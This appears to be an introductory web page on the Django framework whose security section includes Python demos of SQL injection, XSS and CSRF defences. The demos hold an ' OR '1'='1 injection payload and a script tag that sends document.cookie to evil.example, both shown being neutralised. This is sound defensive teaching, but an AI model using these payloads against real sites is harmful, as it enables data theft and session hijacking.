Django

Django is a high-level Web framework, written in Python, that encourages rapid development and clean, pragmatic design.


What is Django?

The Django ORM

The ORM is an incredibly powerful database tool. It creates your database schema (tables, columns and indexes) from your model definitions, and handles insert, update and delete queries as well as some fairly advanced querying - although it's not perfect. It supports multiple database back-ends - MySQL, PostgreSQL, Oracle & SQLite are all supported out of the box, assuming you have the relevant Python database driver installed.

Forms

Forms are not the most fun thing. While Django doesn't make them fun, it at least does a lot for you. You define some fields and how you want the basic validation to work, and Django generates the HTML, adds the error messages and cleans the data so you don't get anything unexpected. The Django forms framework can even build a form directly from a database model you define and save the validated data back to that model, making your job even easier.

Admin

The Django admin is more than just a scaffold. This thing has a wide range of customisations that can be applied and with little to no work could even be deployed as the final admin area of your website - it powers this one.

Who Uses Django?

Playfire a social network for gamers


Disqus a large commenting platform


News Paper

Why Use Django?

Django is Python

Python is a really nice, elegant & powerful language ... and by far my favourite.

Django makes things easier

Django makes things easier for you. It's a complete framework with a lot available - but only if you want it. It tries not to get in the way, and if there are things you don't like you can just work around them. The templating language is a great example of this.

Django Security

Unlike many other frameworks, Django ships with protection against several common classes of web vulnerability built in and switched on by default, including:

SQL Injection

SQL injection is a common exploit in which an attacker alters Web page parameters (such as GET/POST data or URLs) to insert arbitrary SQL snippets that a naive Web application executes in its database directly. It’s probably the most dangerous – and, unfortunately, one of the most common – vulnerabilities out there.
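The difference between a naive query and a parameterised one, shown here as an added example using Python's standard sqlite3 module rather than Django's own code. The table, rows and the payload are constructed for the demo. Django's ORM always sends queries in the parameterised form (`User.objects.filter(username=name)` binds `name` as a parameter), but if you drop down to `Model.objects.raw()` or a raw `connection.cursor()`, you are writing the SQL yourself and must pass the values as parameters too:

```python
import sqlite3

# Constructed sample data for the demo (not from the original page).
USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]

# Classic tautology payload: closes the string literal, then appends OR '1'='1'.
PAYLOAD = "' OR '1'='1"


def make_db():
    """Build an in-memory database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE auth_user (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO auth_user VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Naive version: user input is spliced into the SQL text itself."""
    sql = (
        "SELECT username FROM auth_user "
        f"WHERE username = '{username}' ORDER BY username"
    )
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, username):
    """Safe version: a placeholder plus a bound parameter. The driver sends
    the input as data, so it can never be parsed as SQL."""
    sql = "SELECT username FROM auth_user WHERE username = ? ORDER BY username"
    return [row[0] for row in conn.execute(sql, (username,))]


def demo():
    """Run both lookups against the same payload and a legitimate name."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "parameterised": lookup_parameterised(conn, PAYLOAD),
        "legit": lookup_parameterised(conn, "alice"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:>13}: {rows}")
```

With the payload, the vulnerable lookup returns every user because the WHERE clause becomes `username = '' OR '1'='1'`; the parameterised lookup returns nothing because it is looking for a user literally named `' OR '1'='1`.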

Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of <script> tags. Django's template engine escapes variables automatically; you only lose that protection when you explicitly mark content as safe (the |safe filter or mark_safe()), so treat those as the places to audit.

Attackers often use XSS attacks to steal cookie and session information, or to trick users into giving private information to the wrong person (aka phishing).
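What "escaping before rendering" actually does, as an added example (not Django's code) using Python's standard html.escape, which converts the same five characters Django's autoescaping does: &, <, >, " and '. The attacker payload is constructed for the demo:

```python
from html import escape

# Constructed attacker input: a cookie-stealing script tag (demo only).
PAYLOAD = (
    "<script>document.location='https://evil.example/?c='"
    "+document.cookie</script>"
)


def render_unsafe(name):
    """What a template with escaping disabled does: the value is spliced
    straight into the page, so markup in it becomes live HTML."""
    return f"<p>Hello {name}</p>"


def render_escaped(name):
    """What Django's autoescaping does: <, >, &, \" and ' become entities,
    so the browser shows the text instead of executing it."""
    return f"<p>Hello {escape(name, quote=True)}</p>"


def contains_script_tag(html):
    """Crude check used by the demo: is there a <script element in the output?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_escaped(PAYLOAD))
```

Escaping protects ordinary HTML element content. Values placed inside unquoted attributes, inline JavaScript or URLs need context-specific encoding in addition to this, which is why the |safe filter and mark_safe() should be used only on content you built yourself.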

Cross-Site Request Forgery

Cross-site request forgery (CSRF) happens when a malicious Web site tricks users into unknowingly loading a URL from, or submitting a form to, a site at which they're already authenticated - hence taking advantage of their authenticated status, because the browser attaches their session cookie to the forged request.

Django has built-in protection against this kind of attack: CsrfViewMiddleware rejects POST requests that don't carry a valid token, and the {% csrf_token %} template tag inserts that token into your forms. A cross-site page can't read the token, so it can't produce a request that passes the check.
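A simplified model of the check, added here as an example and not Django's own implementation: the server mints a random token, sends it as a cookie and embeds the same value in the form; on POST the hidden field must match the cookie. A page on another origin can make the victim's browser send the cookie, but it cannot read the cookie, so it cannot fill in the matching field. Names, cookie values and form data below are all constructed for the demo (Django additionally masks the token per response and checks the Origin/Referer header on HTTPS):

```python
import hmac
import secrets

# Names mirror Django's defaults; everything else here is a constructed demo.
TOKEN_COOKIE = "csrftoken"
TOKEN_FIELD = "csrfmiddlewaretoken"


def issue_token():
    """Server side: mint an unguessable token to set as the CSRF cookie."""
    return secrets.token_urlsafe(32)


def render_form(token):
    """Server side: a form rendered for the user, with the token in a hidden
    field (the job {% csrf_token %} does in a Django template)."""
    return {TOKEN_FIELD: token, "amount": "100"}


def check_csrf(cookies, post_data):
    """Middleware side: accept the POST only if the hidden field matches the
    cookie. compare_digest avoids leaking the token via timing."""
    cookie_token = cookies.get(TOKEN_COOKIE)
    form_token = post_data.get(TOKEN_FIELD)
    if not cookie_token or not form_token:
        return False
    return hmac.compare_digest(cookie_token, form_token)


def simulate():
    """Replay three requests from the same logged-in browser."""
    token = issue_token()
    # The browser holds both the session and the CSRF cookie (constructed values).
    browser_cookies = {TOKEN_COOKIE: token, "sessionid": "constructed-session-id"}

    # 1. The user submits the form the site rendered: field matches cookie.
    legit = check_csrf(browser_cookies, render_form(token))

    # 2. A cross-site page auto-submits a form. The browser still sends the
    #    cookies, but the attacker's form has no token field at all.
    forged_missing = check_csrf(browser_cookies, {"amount": "100"})

    # 3. The attacker guesses a token; it cannot match the victim's cookie.
    forged_guess = check_csrf(
        browser_cookies, {TOKEN_FIELD: secrets.token_urlsafe(32), "amount": "100"}
    )
    return legit, forged_missing, forged_guess


if __name__ == "__main__":
    print(simulate())
```

The protection only holds for requests that change state via POST (or PUT/DELETE); a GET that performs an action is forgeable regardless of the token, which is why Django's middleware does not check GET and why views should never mutate data on GET.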

Session Protection

Django's session framework simply doesn't allow sessions to be contained in the URL: the session ID is only ever carried in a cookie, so it doesn't leak through Referer headers, server logs, browser history or links people copy and share.

Exposed Error Messages

Django's DEBUG setting controls the display of these error messages. With DEBUG = True an error page shows the full traceback, local variables and a dump of your settings, which is exactly what an attacker wants to see. Always set DEBUG = False in production (and fill in ALLOWED_HOSTS); Django then returns a plain error page and emails the traceback to the addresses in ADMINS instead.